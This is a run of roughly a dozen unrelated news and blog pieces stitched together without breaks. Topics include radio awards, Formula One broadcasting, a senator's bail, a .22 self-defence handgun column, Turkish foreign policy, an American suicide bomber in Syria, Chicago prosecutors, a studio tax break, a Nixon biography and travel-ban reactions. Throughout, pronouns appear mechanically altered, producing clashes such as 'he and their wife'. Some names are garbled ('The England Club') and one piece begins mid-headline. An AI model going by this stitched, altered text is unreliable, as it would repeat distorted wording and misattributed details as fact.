Radio New Zealand has won one gold and two silver awards against strong international competition at the prestigious New York Festivals International Radio Program Awards announced in New York this morning.
The New York Awards reflect programming that is at the forefront of innovation and competition categories are designed to reflect the emerging trends within the industry, covering all creative facets of the radio broadcast industry.
Gold
Best Live Sound
Radio NZ Concert International Arts Festival concert series
Radio New Zealand Concert's International Arts Festival Concert Series was awarded a gold for Best Live Sound in the Craft category. The series, engineered by Graham Kennedy and Darryl Stack, features three concerts recorded at the New Zealand Festival in 2014. Note: not all audio is available for copyright reasons.
Silver
Culture & The Arts
Sonia Sly: Crime Scene
Produced and presented by Sonia Sly in the Culture and the Arts category, Crime Scene follows photographer Matt Evans as they shoot a photo series inspired by 1950s crime scene photographers.
Human Relations
One in Five: Health Click
A documentary produced and presented by Katy Gosset, about Nelson company Health Click, and a sexual health educator helping parents whose young children with learning difficulties may struggle to navigate puberty.
Finalist Certificates
Best Regularly Scheduled Talk Program
Nine To Noon
From nine to noon every weekday, Kathryn Ryan talks to the people driving the news - in New Zealand and around the world.
Best Public Affairs Program
Mediawatch
Mediawatch looks critically at the New Zealand media - television, radio, newspapers and magazines as well as electronic media.
Travel & Tourism
This Way Up: Inter-island magician
Onboard a ship with a magician who's been helping make children disappear for 25 years!
to pay-TV in UK in 2012 when Sky screened all races live
Shock new figures obtained by the Mail on Sunday show that Formula One suffered a global drop in TV viewing figures last year, including an alarming loss of more than five per cent in Britain - despite Britain's Lewis Hamilton securing the world title in a last-race showdown.
The revelation is the latest hard evidence that sports rights holders who opt for bigger paydays from subscription TV operators are doing so at the expense of wider, mainstream audiences for their sport.
The fall in F1 numbers, disclosed by F1 boss Bernie Ecclestone in the sport's annual broadcast report, yet to be made public, showed that worldwide audiences fell by 5.6 per cent to 425 million different fans tuning in across the season from 450 million previously.
Lewis Hamilton is pictured celebrating their Formula One title triumph at the season-ending race in Abu Dhabi
The British star saw off the challenge from their Mercedes team-mate Nico Rosberg to claim their second title
Ecclestone attributes the decline to ‘the move [F1] has towards Pay-TV in several markets over the last three seasons.' This includes in Britain, where year-on-year audiences were down 5.2 per cent.
Golf fans are reeling this weekend at the news that the BBC will lose the live rights to show The Open - the oldest and most prestigious tournament in the world - after this summer's event at St Andrews.
Sky Sports will pay £10m-a-year for the UK live rights, up from the BBC's £7m a year, and the BBC's 59-year TV ‘ownership' of the event will end, as will live access to millions who do not have pay-TV.
F1 switched to pay-TV in the UK in 2012 when Sky Sports began broadcasting all of the races live while the BBC now only shows half of them. The move boosted F1's UK broadcast income by 110 per cent to £65 million - but at the cost of a wider audience.
Major sports rights owners including the England & Wales Cricket Board and The England Club have wrestled in recent times with the dilemma of more TV income at the cost of a much bigger free-to-air audience.
Rosberg is pictured missing the chicane at the Italian Grand Prix which handed victory to rival Hamilton
The Mercedes pair collide at the Belgian Grand Prix in one of many flashpoints of an enthralling campaign
That pair has taken contrasting approaches, the ECB effectively selling most live cricket to Sky until 2019, although incoming chairperson Colin Graves is desperate to find a way to get live matches back onto free TV. The AEC have resisted approaches to sell Wimbledon tennis to Sky, with a BBC contract in place until 2017, although that decision is under constant review.
The Mail on Sunday can reveal that any slim hopes of live Premier League games being shown on free-to-air TV for the first time have also been dashed. ITV have rejected the possibility of making any bid to screen live Premier League games from 2016-17 because the only theoretically affordable package within their reach is likely to be comprised of low-interest games and ‘small' teams.
The country's biggest free-to-air commercial broadcaster considered the tender document offering matches for the three-year period from 2016-17 to 2018-19 open-minded about the prospect of becoming the first UK channel to provide regular PL games free to fans.
After losing the rights to the Champions League from next season to BT Sport, and deciding not even to bid for Premier League highlights for 2016-19 because they made ‘no commercial sense', their only other option to show any live club football was a bid for the Premier League rights.
Chelsea players celebrate during their draw against Manchester City on Saturday evening. ITV have rejected the possibility of making any bid to screen live Premier League games from 2016-17
Seven packages of games per season for 2016-19 are up for auction, with a first bid deadline of Friday. Five packages have 28 games and two have 14 games, with one of those apparently ripe for an ITV bid - made up of Saturday early evening games.
Sky currently have five packages of games and BT Sport have two and that pair will be key bidders again, with a growing expectation that US-based Discovery Communications (owners of EuroSport) and Qatar-owned beIN Sports will also enter the fray.
But just as ITV decided not even to bother to go up against the BBC for the highlights, aka the ‘Match of the Day rights', retained by the BBC for £204m for 2016-19, they saw no viable way to make a Saturday evening slot of live games work commercially. That package has no first-choice games and mostly fourth-choice and fifth-choice games.
Manchester United and Liverpool have long been the biggest draws for televised football in the UK, with Chelsea and Arsenal next most popular and Manchester City in recent times coming up behind them. The appetite among a general mainstream audience for other clubs drops sharply, and without the prospect of consistent big-name teams and the audience and advertising revenues they would bring, ITV saw any bid as too risky.
The Canadian Press
GATINEAU, Quebec -- Suspended senator Patrick Brazeau has been released from custody on five-thousand dollars bail.
They were charged yesterday in connection with what police describe as a violent domestic disturbance.
As a condition of their release, Brazeau will undergo treatment at a rehabilitation facility in the Quebec municipality of Saint-Andre-d'Argenteuil, which is located along the Ottawa River just south of the town of Lachute.
They have three days to report to rehab.
Brazeau also faces a curfew and has to be home or at the rehab centre between the hours of 11 p.m. and 6 a.m.
Brazeau was arrested yesterday in Gatineau on charges of assault, uttering death threats, cocaine possession and breach of bail conditions.
They pleaded not guilty to all charges when they appeared in court shortly after being arrested but the prosecution opposed their release so they spent the night in jail.
Brazeau was already due to appear in court today on charges of assault and sexual assault in relation to an incident from February, 2013.
Wade writes:
Foghorn, my Dad is planning on getting their CCW license, and is already thinking about the handgun to use. But they say that they are going to get a .22lr or something similar, saying that ‘accuracy is more important than force'. They have hunted their entire life, and is an extremely good shot with both rifle and pistol, but I think they are too cocky when they say “all you need to do is shoot someone in the head and the party's over”. How can I convince them that they may not be able to hit what he's aiming at in a high-stress situation, and that they need to look into a more versatile caliber?
I've got some bad news — your Dad isn't completely wrong. And, because I have nothing better to do today, we're going to open up that whole can of worms . . .
Your dad is completely correct in that a properly placed .22lr round will take a man down for good. Despite the relative thickness of the human skull a typical .22lr round does have enough power to successfully penetrate and cause sufficient damage to kill a human from close range. And on the more fleshy bits of a human it is perfectly capable of inflicting some damage.
The issue we run into with the .22lr round, and one that you seem to have correctly identified, is that when you don't hit a particularly useful organ it doesn't do much immediate damage. The best example I can think of in this case is the wild hogs of Texas and the gulf coast, which have a nasty tendency to survive and escape if they're not hit with a large enough caliber or in the right spot. Humans posess a similar ability to survive extreme punishment and damage without actually dying.
We could sit here all day long until we're blue in the fingers discussing the relative merits of the different calibers, but the best solution is always the same: cold, hard data.
About a year ago Greg Ellifritz over at Buckeye Firearms concluded a pretty darn impressive analysis of gunfight data recorded over a 10 year period, the total count of incidents included in their analysis topping 1,800. It doesn't give us a statistically significant look at murders in the United States, but the data is sufficiently large and normal to give us the ability to use their results to compare the effectiveness of different calibers.
Admittedly 9mm does take up a disproportionate percentage of the observations and .32 data is a little skimpy, but its good enough for our purposes. So, using their data, let's take a look at how well the lowly .22 round does compare to other handgun calibers (and shotguns, just for comparison sake).
First things first, let's see what percentage of observed gunfights ended in a fatality for the person on the receiving end.
The graph is pretty clear on this: .22 caliber firearms are just as deadly in a gunfight as any other handgun caliber. In fact, it beat the average (far right). Surprisingly, every caliber that begins with a 4 (.40 S&W, .45, .44 Mag…) performed worse than the .22 caliber firearms in terms of putting the opponent in the dirt for good.
The next thing I thought was interesting was the metric about how many rounds it took to incapacitate the opponent.
In case you were wondering, the smaller the bar in this example the better the round performed. And, in terms of performance in putting the opponent down, only a shotgun beats the .22 round. I get the feeling that in reality you can chop a round off the 9mm's numbers, as the double tap has been trained into almost every shooter these days and probably means the numbers are artificially high.
Greg also includes something about a “one shot stop” percentage, but I don't agree with their methodology on it and is not presented here. Go read up on it at the original site if you're interested.
There's a small fly in the ointment: the percentage of incidents where the opponent was not incapacitated.
Another chart where large bars are bad, and here the mouseguns aren't doing so hot compared to the big boys. However, I get the feeling that this chart is somewhat deceptive with its results. Newer shooters have a tendency to get the smaller guns with smaller calibers, and also have a tendency to not be as well trained as those carrying the larger rounds. So, instead of this chart being an argument against the lowly .22 round I see it as an argument against poor training. As we saw with the last chart, IF you can hit the guy there's a great chance he's going down. But the issue is hitting him, and incorporating some of the accuracy results from the original study seems to back up my suspicions.
So, in short, what's the answer? Is a .22 a good self defense round? According to the numbers, it looks to be among the best in terms of stopping the threat. Add in the fact that it's lightweight, low recoil and uses firearms that are ridiculously easy to conceal and you can see where a .22 caliber firearm for concealed carry might be a winner.
So, in the immortal words of HAL, “I'm sorry Wade, I can't do that.” According to the best numbers I could find, I can't come up with a valid reason to convince your Dad to move to a higher caliber. Not only is it an effective round, but its size and weight means that your Dad is more likely to actually carry the gun instead of leaving it at home because it was too inconvenient to bring along. And, as we all know, its often the mere presence of a firearm that can save one's life.
Does that mean I'll be swapping out my Wilson Combat 45ACP 1911 for a Derringer? Hell no. But it doesn't stop me from looking at some of those mouseguns for the hot Texas summer…
[Email your firearms-related questions to “Ask Foghorn” via [email protected]. Click here to browse previous posts]
Ankara needs a reality check There are currently some important developments happening in the Middle East. The U.S. is in contact with Iran over their common enemy, the Islamic State of Iraq and the Levant (ISIL). Russia and Iran have concluded new deals in the nuclear energy sector, which will consolidate their political and military ties.
Egypt under Abdel Fattah el-Sisi and the U.S. continue to consolidate their ties. Using the international legitimacy they have gained, despite having toppled an elected president, el-Sisi is also developing new energy – and possibly military – ties with Greek Cyprus and Greece.
Meanwhile, Greek Cyprus held joint naval exercises with Russia and is developing its ties with Israel. Saudi Arabia and Egypt are heading an anti-Muslim Brotherhood front that has regional support.
Syria's Bashar al-Assad looks like they are staying for the foreseeable future, while Washington has established military and political links with Syrian Kurdish groups considered to be offshoots of the Kurdistan Workers' Party (PKK).
These developments concern Turkey greatly. Overt or covert cooperation between Washington and Tehran will contribute to further diminishing Turkey's regional influence. The consolidation of ties between Moscow and Tehran will make it even harder for Ankara's regional plans – including the demise of al-Assad – to materialize.
Egypt's growing ties in and outside the region will ensure Turkey's isolation among Arab regimes, given that Ankara has declared el-Sisi an enemy. Turkey's unwavering support for the Muslim Brotherhood will also ensure that ties with most Middle Eastern governments remain strained.
Al-Assad's staying power will continue to make a mockery of President Recep Tayyip Erdoğan and Prime Minister Ahmet Davutoğlu's moral jihad against him. Moscow's support of Greek Cyprus and ties between Greek Cyprus and Israel will ensure Ankara's warnings over the exploitation of energy reserves in the Eastern Mediterranean will have limited diplomatic clout.
U.S. support for the Syrian Kurds will legitimize groups Ankara considers to be unsavory. It will also weaken the manner in which Ankara is trying to prioritize the fight against ISIL. Related events will further complicate the peace process with the Kurds in Turkey, which has already been harmed over Ankara's stance on Kobani.
The Justice and Development Party (AKP) has a “zero problems with neighbors” policy, which has become a long-forgotten thing, and its efforts to morally rationalize the regional isolation it finds itself in as “glorious loneliness” or “precious loneliness” convinces no one.
We have a president that was once listed as one of the most influential leaders in the world and a potential savior of the politically backward Middle East. We have a prime minister who made their name on the assumption that they are an expert on “strategic depth” in foreign policy.
Looking at what is transpiring in the region, one would have assumed that this is the time when Erdoğan and Davutoğlu would demonstrate their ability to not only use Turkey's influence and power to help stabilize and develop the region, but also to enhance Turkey's own interests. However, we see nothing of the sort.
We are at a time when new alliances that exclude Turkey are being established in order to respond to unexpected developments. Meanwhile new forces are at play, rebounding on Turkey in dangerous ways. There are also opportunities that are being missed by Ankara.
This overall situation clearly needs sophisticated management based on realistic assessments of the situation on the ground. Unfortunately, moralizing from the pulpit with inflated claims about Turkey's place in the world seems to be the only way Erdoğan and Davutoğlu are attempting to respond to the changing environment around them.
Ankara rapidly needs a reality check, and policies to match the situation as it really is, if Turkey is to become the power Erdoğan and Davutoğlu dream of. Otherwise it will just be more shadowboxing with little to show for it in the end.
Story highlights Officials: U.S. focusing on network funneling money, recruits to Syria
Radical Islamists heap praise upon the American for their "martyrdom"
Official: The U.S. believes the suicide bomber is Moner Mohammad Abu-Salha
U.S. officials said they were an American citizen who went to school in Florida
The truck was loaded with munitions, then driven up a hillside in northern Syria. Moments later, there was a massive blast followed by cries of "Allahu Akbar," or "God is great" in Arabic, and the rattling of gunfire.
What made this suicide bombing stand out was not that it happened -- as such attacks have become fairly commonplace in war-torn Syria -- but the identity of one of the men who carried out.
They were American.
In an online video and social media, radical Islamists claiming responsibility for the blast touted one of the attackers as Abu Hurayra Al-Amriki, an American.
Late Thursday, two U.S. officials confirmed their boast.
The man was a U.S. citizen who grew up in Florida and went to school there. Investigators are interviewing family members.
U.S. State Department spokesperson Jen Psaki said Friday evening the American is believed to be Moner Mohammad Abu-Salha.
Whichever name one uses -- Abu-Salha or Al-Amriki -- they were among a group of Americans whom intelligence agents have been trying to keep tabs on since they went to Syria some months ago to join extremists in the fight against the Syrian government.
Smiling, holding a cat
Abu Farouk al Shamy, a spokesperson for the rebel Suqour al-Sham battalion, told CNN that the Sunday attack was executed in coordination with the al-Nusra Front, an al Qaeda-linked organization that the U.S. government has blacklisted as a foreign terror organization.
One video on YouTube, with the title "the American martyrdom from al-Nusra Front," identifies the suicide bomber as Abu Hurayra Al-Amriki. This video and several other social media posts feature a picture of a bearded man with that name, smiling and holding a cat.
Al-Amriki in Arabic means "the American." The name Abu Hurayra, which is popular among Sunni Muslims, offers little clue as to the man's identity. Abu Hurayra was a companion of the Islamic prophet Mohammed and the narrator of Hadith.
Syrian activists say the video is from Sunday and shows militants' preparations and ultimate attack on Syrian military checkpoints in Jabal Al-Arba'een, near the city of Ariha in Idlib province and believed to be along a key rebel supply route.
According to Syrian activists and social media postings, four vehicles laden with explosives were part of the attack. One YouTube video says the American detonated the biggest one, which contained 17 tons of explosives, including artillery shells. It is not clear what exactly this man's involvement was, including whether they were driving an armored truck, a tanker or some other vehicle.
Islamists praise the American
Even if they clearly did not act alone, it is the man identified as Abu Hurayra who has gotten a lot of attention on websites and social media venues tied to radical Islamists.
That includes a tweet by a man with the handle Abu Suleiman al-Muhajer, whose bio identifies them as belonging to al Qaeda in the Levant, the umbrella organization for the al-Nusra Front.
Their tweet, which was published on the radical Islamist website Hanein, features the alleged American's picture and the words, "Abu Hurayra Al-Amriki performed a martyrdom operation in Idlib, Jabal Al-Arba'een. May Allah accept him."
On the heels of this suicide attack, counterterrorism officials are focusing on young Americans who head off to wage war in the embattled Middle Eastern nation, U.S. officials told CNN.
U.S. authorities are investigating a network of recruiters who officials believe are funneling money and young fighters to Syria, the officials said. Their aim is to stop the flow of money and recruits to Syria.
U.S. intelligence and law enforcement officials have expressed concerns about Americans joining the fight in Syria, including with groups like the jihadist al-Nusra Front. The worry is that they and other Westerners might pose a threat when they return a home, or perhaps end up targeting Europe or Western interests in the Middle East.
"There's going to be a diaspora out of Syria," FBI Director James Comey said last week. "And we are determined not to let lines be drawn from Syria today to a future 9/11."
During the latest Super Tuesday, black Chicago activists flew banners across the city skyline criticizing Mayor Rahm Emanuel and State's Attorney Anita Alvarez for their shameful response to the police killing of 17 year-old Laquan McDonald. The banners read: “Chicago Stands with Laquan, Hillary Stands with Rahm— #ByeAnita #ByeRahm” as the activist group Assata's Daughter's decried both Alvarez and Emanuel while also criticizing Hillary Clinton for not condemning Mayor Emanuel strongly enough. While the Democratic front-runner Clinton narrowly won Illinois against challenger Bernie Sanders (along with big victories elsewhere), Anita Alvarez conceded to challenger Kim Foxx, who prevented Alvarez from a third term.
While the Laquan McDonald shooting, and subsequent cover-up, has been widely publicized and is seen as the impetus for Alvarez's electoral downfall, an investigation by The Daily Beast found that Alvarez failed to prosecute 68 police officers that killed civilians. Even more shocking is the fact that these decisions were seemingly made without any documentation explaining the decision to forego any prosecution.
In another controversial police shooting case, Alvarez charged an off-duty police officer with only involuntary manslaughter in the shooting death of Rekia Boyd, an unarmed 22 year-old black woman. Judge Dennis Porter cleared Chicago police detective Dante Servin of involuntary manslaughter, ruling that the shooting was intentional, so Porter couldn't be found guilty of involuntary manslaughter. Critics accused Alvarez of purposefully undercharging the detective, allowing them to go free after the tragic death of Boyd. Mayor Emanuel recommended that detective Servin be fired, but they somehow remain on the job. Chicago agreed to pay Boyd's family $4.5 million as compensation for Rekia's death.
Kim Foxx, who won the Cook County State's Attorney job from Alvarez with over 60% of the vote, stated that their victory was about “turning the page” and that, “The need to rebuild a broken criminal justice system here in Cook County is not work that should be taken lightly.” From their statement following Foxx's defeat of Alvarez, Assata's Daughters made it clear that they will be watching, as will surely Black Lives Matter and other civil rights group demanding criminal justice reform in Chicago and across the nation.
The full statement released by Assata's Daughters following the defeat of Alvarez:
State's Attorney Anita Alverez Loses Re-Election After Tireless Campaigning from Chicago's Black Youth
“Chicago Black youth have kicked Anita Alvarez out of office. Just a month ago, Anita Alvarez was winning in the polls. Communities who refuse to be killed, jailed, and abused without any chance at justice refused to allow them to be re-elected as State's Attorney. “We did this for Rekia… “We did this for Laquan… “We won't stop until we're free and Kim Foxx should know that as well.” ### About Assata's Daughters Assata's Daughters is an intergenerational collective of Black women and girls. This demographic represents both the largest growing prison population and those leading protests against state violence in Chicago. For More information visit: http://assatasdaughters.org For photos of today's #ByeAnita banners visit: https://app.eyefi.com/ s/29400487-2-uPFgBoR3PjI8Ucrr
A proposed $63.5 million movie studio complex inched closer to a reality Tuesday with the approval of tax breaks worth at least $3.1 million, according to the Industrial Development Board, which approved the subsidy.
If completed, the Deep South Studios complex would be one of the biggest investments in the local film industry to date. Its 19-acre campus, an as-yet undeveloped plot near the foot of the Crescent City Connection bridge, is slated to include a 262,000 square-feet of floor space spread over six sound stages, two production buildings and a half-dozen ancillary structures.
The developer of Deep South Studios bills it as the first "full service" back lot facility of its kind in the area, capable of handling all aspects of production, from filming to digital effects and editing.
The subsidy, which was unanimously approved by the board, comes in the form of a property tax break called a PILOT, or payment in lieu of taxes, deal.
Rather than pay the full tab for its property taxes, which would rise sharply when the land is developed, Deep South would only pay a fraction of that amount over the 10-year life of the deal, according to David Wolf, an attorney for the board.
While the project is under construction, Deep South would only have to pay taxes based on the value of the undeveloped property, Wolf said. Once the complex comes online, Deep South would begin paying taxes based on the value of the developed site, according to a document provided by Wolff.
In the first year, Deep South would pay 10 percent of the $580,000 tax bill it would have had to pay if not for the tax break, according to the document. That percentage creeps up over the 10-year life of the deal. In year 11, Deep South will have to pay its full tax bill.
If Deep South grosses more than $10 million a year, it would have to pay more, according to Wolf.
The incentives deal isn't final until Deep South successfully raises the capital it needs to build the complex.
The Industrial Development Board's rules require it to do two kinds of assessment on a project before approving tax breaks or other incentives. First, the board most conduct a "but-for" assessment, which evaluates whether the company seeking the break could do the project without a subsidy. Then, a separate assessment must be done to determine whether the benefits brought by the project -- added jobs, increased revenue from sales tax etc. -- eclipse the revenue loss caused by the tax break.
It's not clear whether those assessments were done on the PILOT deal approved Tuesday.
Scott Niemeyer, president and chief executive of Deep South, said they plan to finance the bulk of the project, about $49.5 million, by soliciting investors through the federal EB-5 program, which gives foreign investors preferential treatment in the immigration process in exchange for investing in American companies that create jobs.
In a brief interview after the meeting, Niemeyer said they planned to use the tax-breaks promised by the board to entice EB-5 investors. The tax breaks will improve Deep South's cash flow projections, and the Development Board's stamp of approval will help demonstrate to potential investors that their project their viable, Niemeyer said.
The $14 million or so not covered by EB-5 investors will be raised by selling equity in the company, Niemeyer said.
It will be the first time the supersoft has been used at the famed Autodromo Hermanos Rodriguez in Mexico City since its return the Formula One calendar last season.
The supersoft is the assigned compound for drivers who reach Q3 in qualifying, while the soft and medium are nominated for the race - meaning drivers must have at least one set of each compound, and must use at least one of them during the 71-lap race.
Last year's Mexican Grand Prix, where only the medium and soft tyres were available, was won by Mercedes' Nico Rosberg from teammate Lewis Hamilton and Williams' Valtteri Bottas.
The 2016 tyre choices so far:
Australia - supersoft, soft, medium
Bahrain - supersoft, soft, medium
China - supersoft, soft, medium
Russia - supersoft, soft, medium
Spain - soft, medium, hard
Monaco - ultrasoft, supersoft, soft
Canada - ultrasoft, supersoft, soft
Europe - supersoft, soft, medium
Austria - ultrasoft, supersoft, soft
Great Britain - soft, medium, hard
Hungary - supersoft, soft, medium
Germany - supersoft, soft, medium
Italy - supersoft, soft, medium
Belgium - supersoft, soft, medium
Singapore - ultrasoft, supersoft, soft
Malaysia - soft, medium, hard
Japan - soft, medium, hard
United States - supersoft, soft, medium
Mexico - supersoft, soft, medium
TL;DR, I love my Dragonfly tea light holders - thank you!!
When I got home from running errands this morning, I checked the mailbox and hurried back inside where the air is cool. After putzing around the house for a few minutes, I decide I need something from my shed - when I open my door, I see that the trashcan under the carport is turned around. "Weird." I think, reaching over to turn it around. Then I see The Box, tucked behind the trash can, which I wouldn't have seen from pretty much any other angle. "Oh! A fan?" I wondered, "Who would randomly give me a fan? My landlady? No, that doesn't make any sense."
So I pick it up and take it inside. I see the shipping slip, and try to remember if I ordered anything. I don't think I'm expecting a package... hmm. I open the box apprehensively. There's a card! When I read "I hope you like your dragonfly tea candleholders." I finally realize that this is my Arbitrary Day gift!! I carefully unwrap the tea candleholders and set them up.
They're a bit whimsical, which I just love! They're made of metal with a green and blue design on the wings, which are partially opaque to allow the candlelight to shine through. They're perfect for our breakfast counter, which I've only recently de-cluttered and starting actually using as a place to sit and eat :) Thank you so much!
Richard Nixon (1913-94), the 37th U.S. president, is best remembered as the only president ever to resign from office. Nixon stepped down in 1974, halfway through their second term, rather than face impeachment over their efforts to cover up illegal activities by members of their administration in the Watergate scandal. A former Republican member of congress and U.S. senator from California, they served two terms as vice president under Dwight Eisenhower (1890-1969) in the 1950s. In 1960, Nixon lost their bid for the presidency in a close race with Democrat John F. Kennedy (1917-63). They ran for the White House again in 1968 and won. As president, Nixon's achievements included forging diplomatic ties with China and the Soviet Union, and withdrawing U.S. troops from an unpopular war in Vietnam. However, Nixon's involvement in Watergate tarnished their legacy and deepened American cynicism about government.
Watch a preview of the two-night event Presidents at War, premiering Sunday, February 17 at 8/7c.
Education and Early Political Career
Richard Milhous Nixon was born on January 9, 1913, in Yorba Linda, California. They were the second of five sons of Francis Anthony Nixon (1878-1956), who struggled to earn a living running a grocery store and gas station, and their wife, Hannah Milhous Nixon (1885-1967). .Nixon absorbed their parents' discontent with their working-class circumstances and developed a strong sense of ambition..
ADVERTISEMENT Thanks for watching! Visit Website
ADVERTISEMENT Thanks for watching! Visit Website
Did you know? While serving in the U.S. Navy during World War II, Richard Nixon won large amounts of money playing poker. They used these winnings to help fund their first political campaign in 1946.
ADVERTISEMENT Thanks for watching! Visit Website
They attended Whittier College, where they excelled as a debater and was elected president of the student body before graduating in 1934. Three years later, they earned a law degree from Duke University, where they were head of the student bar association and graduated near the top of their class. After Duke, they returned to Whittier, California, and began working as an attorney. In 1940, Nixon married Thelma Catherine “Pat” Ryan (1912-93), whom they met while participating in a local theater group. The couple had two daughters, Patricia (1946-) and Julie (1948-). When America entered World War II (1939-45), Nixon joined the U.S. Navy and served as an operations officer in the Pacific.
Following the war, Nixon launched their political career in 1946 when they defeated a five-term Democratic incumbent to represent their California district in the U.S. House of Representatives. As a member of congress, Nixon served on the House Un-American Activities Committee and rose to national prominence by leading a controversial investigation of Alger Hiss (1904-1996), a well-regarded former State Department official who was accused of spying for the Soviet Union in the late 1930s.
Nixon was re-elected to Congress in 1948 and two years later, in 1950, won a seat in the U.S. Senate.
An Unsuccessful Bid for the Presidency
Although Nixon's attacks on alleged Communists and political opponents alarmed some people, they increased their popularity among conservative Republicans. In 1952, General Dwight Eisenhower selected the 39-year-old first-term senator to be their vice presidential running mate. A few months after accepting the nomination, Nixon became the target of a negative campaign that raised questions about money and gifts they allegedly received from industry lobbyists. Nixon answered these charges in their famous “Checkers” speech, claiming that the only gift they ever accepted was a puppy named Checkers for their young daughter. The speech proved effective and preserved Nixon's spot on the ticket.
Eisenhower and Nixon won the election of 1952 and were re-elected in 1956. In 1960, Nixon claimed the Republican presidential nomination, but lost one of the closest elections in American history to U.S. Senator John F. Kennedy of Massachusetts. The turning point of the campaign came in the first-ever nationally televised presidential debate. During the broadcast, Nixon appeared pale, nervous and sweaty compared with their tan, well-rested and vigorous opponent.
The loss to Kennedy dealt a terrible blow to Nixon's ego. They claimed that the media disliked them and had slanted campaign coverage in favor of their handsome and wealthy opponent. Nixon returned home to California, where they practiced law and launched a campaign for governor in 1962. When they lost this election as well, many observers believed that their political career was over. As a disgusted Nixon told reporters, “You won't have Nixon to kick around anymore.”
Winning the White House
Six years after losing the governorship in their home state, Nixon made a remarkable political comeback and once again claimed their party's presidential nomination. They prevailed in the 1968 U.S. presidential election, defeating Democrat Hubert Humphrey (1911-78) and third-party candidate George Wallace (1919-98). Nixon took office at a time of upheaval and change in the U.S. The American people were bitterly divided over the Vietnam War (1954-75), while women marched for equal rights and racial violence rocked the nation's cities.
Declaring their intention to achieve “peace with honor” in Vietnam, Nixon introduced a strategy known as Vietnamization, which called for gradually withdrawing American troops from the war while training South Vietnamese army forces to take over their own defense. In January 1973, Nixon administration officials reached a peace agreement with Communist North Vietnam. The last American combat troops left Vietnam in March of that year. The hostilities continued, however, and in 1975 North Vietnam conquered South Vietnam and reunited the country under Communist rule.In addition to dealing with the Vietnam War, Nixon made historic visits, in 1972, to China and the Soviet Union. They reduced tensions between these Communist nations and the U.S., helping to set the stage for establishing formal diplomatic relations. Nixon also signed important treaties to limit the production of nuclear weapons.
The Watergate Scandal and Beyond
While Nixon was running for re-election in 1972, operatives associated with their campaign broke into the headquarters of the Democratic National Committee at the Watergate complex in Washington, D.C. Several members of Nixon's administration had knowledge of the burglary and while Nixon denied any involvement, secret tapes of White House conversations later revealed that the president had participated in efforts to cover up the criminal activity.
Facing impeachment by Congress, Nixon resigned from office on August 9, 1974. They were replaced by Vice President Gerald Ford (1913-2006), who a month later pardoned Nixon for any wrongdoing. A number of administration officials were eventually convicted of crimes related to the Watergate affair.
After leaving the White House, Nixon retired to California (he and their wife later moved to New Jersey) and quietly worked to rehabilitate their image, writing books, traveling extensively and consulting with Democratic and Republican presidents. By the time they died on April 22, 1994, at age 81 in New York City, after suffering a stroke, some people viewed them as a respected elder statesman. Other Americans, however, rejected efforts to paint them as anything but a disgraced criminal.
Access hundreds of hours of historical video, commercial free, with HISTORY Vault. Start your free trial today.
PHOTO GALLERIES
The sequel to monster movie Pacific Rim will be directed by the executive producer and head writer of Daredevil, Deadline reports. Steven S. DeKnight will helm Pacific Rim 2, their first ever directing gig after creating TV series Spartacus, and helping to to make Netflix original Daredevil a success. Shortly after the news was announced, Pacific Rim director Guillermo Del Toro offered their blessing on Twitter, saying that he'd met with DeKnight and they and the team behind the sequel were "so happy with our choice."
It was announced that Pacific Rim would be getting a sequel in 2014, a year after the monsters vs. mecha movie scored $411 million at the worldwide box office. At the time, del Toro said the sequel would come out on April 2nd, 2017, and would see a return of characters from the first movie. "Raleigh, Mako, Newt, Gottlieb and who knows, maybe even Hannibal Chau — but we are taking them into a fresh territory that will display amazing sights and battles," the filmmaker said in a statement. "The first film set the stage and now we're ready to have a blast."
Met w DeKnight and we are all so happy with our choice to take Pac Rim 2to where we know it can go!! — Guillermo del Toro (@RealGDT) February 24, 2016
The Pan's Labyrinth director echoed that sentiment in today's tweets, indicating that the new movie would have even more ridiculous explosions that its city-toppling predecessor. "Now Pac Rim is a known property and we can expand big!," they said, before asking their 267,000 followers to "dream of kaijus and mecha!"
In the wake of the Supreme Court reinstatement of substantially all of President Trump's travel Executive Order, the left is responding as expected.
Left-wing and Islamic groups are outraged and don't seem to understand the ruling . . . or the judicial role of the Supreme Court, while lefties on Twitter are in full meltdown mode.
The Council on American-Islamic Relations (CAIR) released a statement that appears to be premised on the 9-0 Supreme Court decision's failure to weigh the socio-cultural climate CAIR perceives rather than the law and Constitution.
The Council on American-Islamic Relations (CAIR), the nation's largest Muslim civil rights and advocacy organization, said today's decision by the U.S. Supreme Court allowing a limited version of the Trump administration's “Muslim ban” executive orders to take effect ignores the Islamophobic origins of the policy and emboldens Islamophobes in the Trump administration. . . . . “Today's decision by the Supreme Court ignores the anti-Muslim bigotry that is at the heart of the travel ban executive orders and will inevitably embolden Islamophobes in the administration to expand efforts to target the Muslim community with unconstitutional and counterproductive policies. It also ignores the almost-unanimous rejection of the Muslim ban by lower courts due to its religious intolerance and racial animus. “While the court continued blocking those parts of the Muslim ban that would prevent entry for anyone with a ‘credible claim of a bona fide relationship with a person or entity in the United States,' it has opened the door to legal chaos and official overreach in embassies and at the border. “We will work with our civil rights partners to offer a legal and legislative response as the Muslim ban moves forward on the ground and in the Supreme Court.” Awad said today's decision was particularly disturbing for American Muslims, coming as it does on the Islamic end-of-Ramadan holiday of Eid ul-Fitr.
In a similarly emotional and ideological response, South Asian Americans Leading Together (SAALT) released a statement focused on the “ideals” of the country (as they define them) rather than the rule of law.
South Asian Americans Leading Together (SAALT), a national South Asian racial justice and civil rights organization, strongly objects to the Supreme Court's decision to reinstate part of President Trump's “Muslim Ban”. It is disappointing that the highest court in our land will hear the federal government's appeal despite federal appellate courts repeatedly striking down and staying key parts of the “Muslim Ban” as unquestionably unconstitutional. “Reinstating any part of this administration's patently discriminatory ‘Muslim Ban' is contrary to the values of the United States and the ideals this country was founded on,” stated Suman Raghunathan, Executive Director of SAALT. “The President's executive orders, and the Supreme Court's decision to partially reinstate the ban, amounts to government sanctioned discrimination. It does not make America safe, it makes America afraid.” Individuals from the six majority-Muslim countries identified in the President's executive orders who do not have a “bona fide” relationship with a person or organization in the United States will be barred from entering the country. This administration's dogged pursuit of a “Muslim Ban” has provided a prominent platform for white supremacists and anti-immigrant voices.
Meanwhile, the knee-jerk outpouring of outrage and indignation on Twitter is quite hilarious.
BREAKING: #SCOTUS to take up Trump's Muslim ban. We'll see them in court. #NoMuslimBanEVER — ACLU National (@ACLU) June 26, 2017
#SCOTUS's decision to largely lift injunctions on the #MuslimBan is a step backwards for our national security. https://t.co/TcUWwKaLsB — Nancy Pelosi (@NancyPelosi) June 26, 2017
